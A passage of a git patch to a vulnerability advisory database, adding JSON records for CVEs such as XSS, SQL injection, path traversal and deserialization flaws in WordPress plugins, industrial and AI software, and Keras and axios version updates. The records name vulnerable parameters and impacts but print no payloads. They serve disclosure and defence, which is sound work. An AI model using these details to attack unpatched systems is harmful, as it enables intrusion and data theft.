+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: reject new transactions if the fs is fully read-only\n\n[BUG]\nThere is a bug report where a heavily fuzzed fs is mounted with all\nrescue mount options, which leads to the following warnings during\nunmount:\n\n BTRFS: Transaction aborted (error -22)\n Modules linked in:\n CPU: 0 UID: 0 PID: 9758 Comm: repro.out Not tainted\n 6.19.0-rc5-00002-gb71e635feefc #7 PREEMPT(full)\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014\n RIP: 0010:find_free_extent_update_loop fs/btrfs/extent-tree.c:4208 [inline]\n RIP: 0010:find_free_extent+0x52f0/0x5d20 fs/btrfs/extent-tree.c:4611\n Call Trace:\n \n btrfs_reserve_extent+0x2cd/0x790 fs/btrfs/extent-tree.c:4705\n btrfs_alloc_tree_block+0x1e1/0x10e0 fs/btrfs/extent-tree.c:5157\n btrfs_force_cow_block+0x578/0x2410 fs/btrfs/ctree.c:517\n btrfs_cow_block+0x3c4/0xa80 fs/btrfs/ctree.c:708\n btrfs_search_slot+0xcad/0x2b50 fs/btrfs/ctree.c:2130\n btrfs_truncate_inode_items+0x45d/0x2350 fs/btrfs/inode-item.c:499\n btrfs_evict_inode+0x923/0xe70 fs/btrfs/inode.c:5628\n evict+0x5f4/0xae0 fs/inode.c:837\n __dentry_kill+0x209/0x660 fs/dcache.c:670\n finish_dput+0xc9/0x480 fs/dcache.c:879\n shrink_dcache_for_umount+0xa0/0x170 fs/dcache.c:1661\n generic_shutdown_super+0x67/0x2c0 fs/super.c:621\n kill_anon_super+0x3b/0x70 fs/super.c:1289\n btrfs_kill_super+0x41/0x50 fs/btrfs/super.c:2127\n deactivate_locked_super+0xbc/0x130 fs/super.c:474\n cleanup_mnt+0x425/0x4c0 fs/namespace.c:1318\n task_work_run+0x1d4/0x260 kernel/task_work.c:233\n exit_task_work include/linux/task_work.h:40 [inline]\n do_exit+0x694/0x22f0 kernel/exit.c:971\n do_group_exit+0x21c/0x2d0 kernel/exit.c:1112\n __do_sys_exit_group kernel/exit.c:1123 [inline]\n __se_sys_exit_group kernel/exit.c:1121 [inline]\n __x64_sys_exit_group+0x3f/0x40 kernel/exit.c:1121\n x64_sys_call+0x2210/0x2210 arch/x86/include/generated/asm/syscalls_64.h:232\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xe8/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n RIP: 0033:0x44f639\n Code: Unable to access opcode bytes at 0x44f60f.\n RSP: 002b:00007ffc15c4e088 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7\n RAX: ffffffffffffffda RBX: 00000000004c32f0 RCX: 000000000044f639\n RDX: 000000000000003c RSI: 00000000000000e7 RDI: 0000000000000001\n RBP: 0000000000000001 R08: ffffffffffffffc0 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000246 R12: 00000000004c32f0\n R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001\n \n\nSince rescue mount options will mark the full fs read-only, there should\nbe no new transaction triggered.\n\nBut during unmount we will evict all inodes, which can trigger a new\ntransaction, and triggers warnings on a heavily corrupted fs.\n\n[CAUSE]\nBtrfs allows new transaction even on a read-only fs, this is to allow\nlog replay happen even on read-only mounts, just like what ext4/xfs do.\n\nHowever with rescue mount options, the fs is fully read-only and cannot\nbe remounted read-write, thus in that case we should also reject any new\ntransactions.\n\n[FIX]\nIf we find the fs has rescue mount options, we should treat the fs as\nerror, so that no new transaction can be started.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23214" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1972f44c189c8aacde308fa9284e474c1a5cbd9f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3228b2eceb6c3d7e237f8a5330113dbd164fb90d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a928eecf030a9a5dc5f5ca98332699f379b91963" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json b/advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json new file mode 100644 index 0000000000000..16e327c5f4939 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vw84-mx3m-hw5p", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1404" + ], + "details": "The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the filter parameters (e.g., 'filter_first_name') in all versions up to, and including, 2.11.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1404" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/assets/js/um-members.js#L515" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members.php#L348" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3458086" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ba62b804-f101-4e29-8304-fb2b7dad333c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json b/advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json new file mode 100644 index 0000000000000..30189cc7dbd4c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vwcq-x7gx-g26f", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-8308" + ], + "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Key Software Solutions Inc. INFOREX- General Information Management System allows XSS Through HTTP Headers.This issue affects INFOREX- General Information Management System: from 2025 and before through 18022026.\n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8308" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0075" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json b/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json new file mode 100644 index 0000000000000..1ca49c2294cfa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfhp-qgm8-5p5c", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-27100" + ], + "details": "Jenkins 2.550 and earlier, LTS 2.541.1 and earlier accepts Run Parameter values that refer to builds the user submitting the build does not have access to, allowing attackers with Item/Build and Item/Configure permission to obtain information about the existence of jobs, the existence of builds, and if a specified build exists, its display name.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27100" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2026-02-18/#SECURITY-3658" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json b/advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json new file mode 100644 index 0000000000000..239db0c71b690 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whmh-gx62-v47m", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-59920" + ], + "details": "When hours are entered in time@work, version 7.0.5, it performs a query to display the projects assigned to the user. If the query URL is copied and opened in a new browser window, the ‘IDClient’ parameter is vulnerable to a blind authenticated SQL injection. If the request is made with the TWAdmin user with the sysadmin role enabled, exploiting the vulnerability will allow commands to be executed on the system; if the user does not belong to the sysadmin role, they will still be able to query data from the database.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59920" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-timework-systemswork" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json b/advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json new file mode 100644 index 0000000000000..9baadc5170937 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wq2g-h2h9-v8x3", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60038" + ], + "details": "A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running Rexroth IndraWorks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60038" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json b/advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json new file mode 100644 index 0000000000000..c7882935d1b95 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvvh-pcq5-hc6f", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33250" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33250" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33250" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json b/advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json new file mode 100644 index 0000000000000..e9668086651a4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ww2j-3p54-3m69", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-8781" + ], + "details": "The Bookster – WordPress Appointment Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘raw’ parameter in all versions up to, and including, 2.1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8781" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/bookster/trunk/src/Models/Database/QueryBuilder.php#L133" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3434484" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1fc5f0ac-3323-4e6c-8900-10e13294ff9a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T13:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json b/advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json new file mode 100644 index 0000000000000..e42c5f8bdd069 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x536-g6fc-g963", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-2464" + ], + "details": "Path traversal vulnerability in the AMR Printer Management 1.01 Beta web service, which allows remote attackers to read arbitrary files from the underlying Windows system by using specially crafted path traversal sequences in requests directed to the web management service. The service is accessible without authentication and runs with elevated privileges, amplifying the impact of the vulnerability. An attacker can exploit this condition to access sensitive and privileged files on the system using path traversal payloads. Successful exploitation of this vulnerability could lead to the unauthorized disclosure of internal system information, compromising the confidentiality of the affected environment.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2464" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/directory-traversal-amr-printer-management-amr" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:07Z" + } +} \ No newline at end of file From 5c0e07c5b0bb7b24fb941ba52871385af18a7e3a Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 16:11:57 +0000 Subject: [PATCH 153/215] Publish GHSA-xfhx-r7ww-5995 --- .../GHSA-xfhx-r7ww-5995.json | 25 ++++++++++--------- 1 file changed, 13 insertions(+), 12 deletions(-) diff --git a/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json b/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json index 2911ab16e66df..98074e802f1ca 100644 --- a/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json +++ b/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-xfhx-r7ww-5995", - "modified": "2026-01-15T20:11:51Z", + "modified": "2026-02-18T16:08:35Z", "published": "2026-01-15T15:31:19Z", "aliases": [ "CVE-2026-0897" ], "summary": "Google Keras Allocates Resources Without Limits or Throttling in the HDF5 weight loading component", - "details": "Allocation of Resources Without Limits or Throttling in the HDF5 weight loading component in Google Keras 3.0.0 through 3.13.0 on all platforms allows a remote attacker to cause a Denial of Service (DoS) through memory exhaustion and a crash of the Python interpreter via a crafted .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape.", + "details": "Allocation of Resources Without Limits or Throttling in the HDF5 weight loading component in Google Keras 3.0.0 through 3.12.0 and 3.13.0 on all platforms allows a remote attacker to cause a Denial of Service (DoS) through memory exhaustion and a crash of the Python interpreter via a crafted .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape.", "severity": [ { "type": "CVSS_V4", @@ -28,14 +28,11 @@ "introduced": "3.0.0" }, { - "fixed": "3.13.1" + "fixed": "3.12.1" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 3.13.0" - } + ] }, { "package": { @@ -47,17 +44,17 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0.0" + "introduced": "3.13.0" }, { - "fixed": "3.12.1" + "fixed": "3.13.1" } ] } ], - "database_specific": { - "last_known_affected_version_range": "<= 3.12.0" - } + "versions": [ + "3.13.0" + ] } ], "references": [ @@ -77,6 +74,10 @@ "type": "WEB", "url": "https://github.com/keras-team/keras/commit/7360d4f0d764fbb1fa9c6408fe53da41974dd4f6" }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/commit/f704c887bf459b42769bfc8a9182f838009afddb" + }, { "type": "PACKAGE", "url": "https://github.com/keras-team/keras" From 2e5cf78652535edad64ebb74d32eca54d553f9e7 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 17:16:44 +0000 Subject: [PATCH 154/215] Publish GHSA-43fc-jf86-j433 --- .../GHSA-43fc-jf86-j433.json | 38 ++++++++++++++++++- 1 file changed, 36 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json b/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json index a7d9702027908..c42b11fa1c57f 100644 --- a/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json +++ b/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-43fc-jf86-j433", - "modified": "2026-02-09T22:39:32Z", + "modified": "2026-02-18T17:15:11Z", "published": "2026-02-09T17:46:14Z", "aliases": [ "CVE-2026-25639" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { "fixed": "1.13.5" @@ -36,6 +36,28 @@ "database_specific": { "last_known_affected_version_range": "<= 1.13.4" } + }, + { + "package": { + "ecosystem": "npm", + "name": "axios" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.30.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.30.2" + } } ], "references": [ @@ -51,14 +73,26 @@ "type": "WEB", "url": "https://github.com/axios/axios/pull/7369" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/pull/7388" + }, { "type": "WEB", "url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e" + }, { "type": "PACKAGE", "url": "https://github.com/axios/axios" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/releases/tag/v0.30.0" + }, { "type": "WEB", "url": "https://github.com/axios/axios/releases/tag/v1.13.5" From 0bb5d2b0ebfa02dc8ba10c97a461b9018a24ccaf Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 17:39:15 +0000 Subject: [PATCH 155/215] Publish Advisories GHSA-gq9c-wg68-gwj2 GHSA-xwjm-j929-xq7c --- .../GHSA-gq9c-wg68-gwj2.json | 63 +++++++++++++++++ .../GHSA-xwjm-j929-xq7c.json | 68 +++++++++++++++++++ 2 files changed, 131 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-gq9c-wg68-gwj2/GHSA-gq9c-wg68-gwj2.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json diff --git a/advisories/github-reviewed/2026/02/GHSA-gq9c-wg68-gwj2/GHSA-gq9c-wg68-gwj2.json b/advisories/github-reviewed/2026/02/GHSA-gq9c-wg68-gwj2/GHSA-gq9c-wg68-gwj2.json new file mode 100644 index 0000000000000..210f1edb3906b --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-gq9c-wg68-gwj2/GHSA-gq9c-wg68-gwj2.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gq9c-wg68-gwj2", + "modified": "2026-02-18T17:38:39Z", + "published": "2026-02-18T17:38:39Z", + "aliases": [], + "summary": "OpenClaw has a path traversal in browser trace/download output paths may allow arbitrary file writes", + "details": "## Summary\n\n OpenClaw’s browser control API accepted user-supplied output paths for trace/download files without consistently\n constraining writes to OpenClaw-managed temporary directories.\n\n ## Impact\n\n If an attacker can access the browser control API, they could attempt to write trace/download output files outside\n intended temp roots, depending on process filesystem permissions.\n\n ## Affected versions\n\n `openclaw` `< 2026.2.13`\n\n ## Fixed versions\n\n `openclaw` `>= 2026.2.13`\n\n ## Remediation\n\n Upgrade to `2026.2.13` or later.\n\n ## What changed\n\n The fix constrains output paths for:\n\n - `POST /trace/stop`\n - `POST /wait/download`\n - `POST /download`\n\n All three now enforce OpenClaw temp-root boundaries and reject traversal/escape paths.\n\n ## Credits\n\n Thanks to Adnan Jakati (@jackhax) of Praetorian for responsible disclosure.\n\n Fix shipped in PR #15652 and merged to `main` on February 13, 2026 (`7f0489e4731c8d965d78d6eac4a60312e46a9426`).\n\n---\n\nFix commit 7f0489e4731c8d965d78d6eac4a60312e46a9426 confirmed on main and in v2026.2.14. Upgrade to `openclaw >= 2026.2.13`.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gq9c-wg68-gwj2" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/15652" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/7f0489e4731c8d965d78d6eac4a60312e46a9426" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:38:39Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json b/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json new file mode 100644 index 0000000000000..cbafa16a3039d --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwjm-j929-xq7c", + "modified": "2026-02-18T17:37:53Z", + "published": "2026-02-18T17:37:52Z", + "aliases": [ + "CVE-2026-26972" + ], + "summary": "OpenClaw has a Path Traversal in Browser Download Functionality", + "details": "### Summary\n\nOpenClaw browser download helpers accepted an unsanitized output path. When invoked via the browser control gateway routes, this allowed path traversal to write downloads outside the intended OpenClaw temp downloads directory.\n\nThis issue is not exposed via the AI agent tool schema (no `download` action). Exploitation requires authenticated CLI access or an authenticated gateway RPC token.\n\n### Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: >=2026.1.12, <=2026.2.12\n- Fixed: >=2026.2.13\n\n### Details\n\nAffected code: `src/browser/pw-tools-core.downloads.ts` (`waitForDownloadViaPlaywright`, `downloadViaPlaywright`).\n\nFixed entrypoints (as of 2026.2.13):\n- Gateway browser control routes `/wait/download` and `/download` now restrict `path` to `DEFAULT_DOWNLOAD_DIR` via `resolvePathWithinRoot`.\n\n### Fix Commit(s)\n\n- 7f0489e4731c8d965d78d6eac4a60312e46a9426\n\n### Mitigation\n\nUpgrade to `openclaw` >=2026.2.13.\n\nThanks @locus-x64 for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2026.1.12" + }, + { + "fixed": "2026.2.13" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2026.2.12" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xwjm-j929-xq7c" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/7f0489e4731c8d965d78d6eac4a60312e46a9426" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.13" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:37:52Z", + "nvd_published_at": null + } +} \ No newline at end of file From 0083c7c33098b09fa9955cedbc145423abd69ad5 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 17:41:32 +0000 Subject: [PATCH 156/215] Publish Advisories GHSA-4564-pvr2-qq4h GHSA-7rcp-mxpq-72pj --- .../GHSA-4564-pvr2-qq4h.json | 75 +++++++++++++++++++ .../GHSA-7rcp-mxpq-72pj.json | 63 ++++++++++++++++ 2 files changed, 138 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json create mode 100644 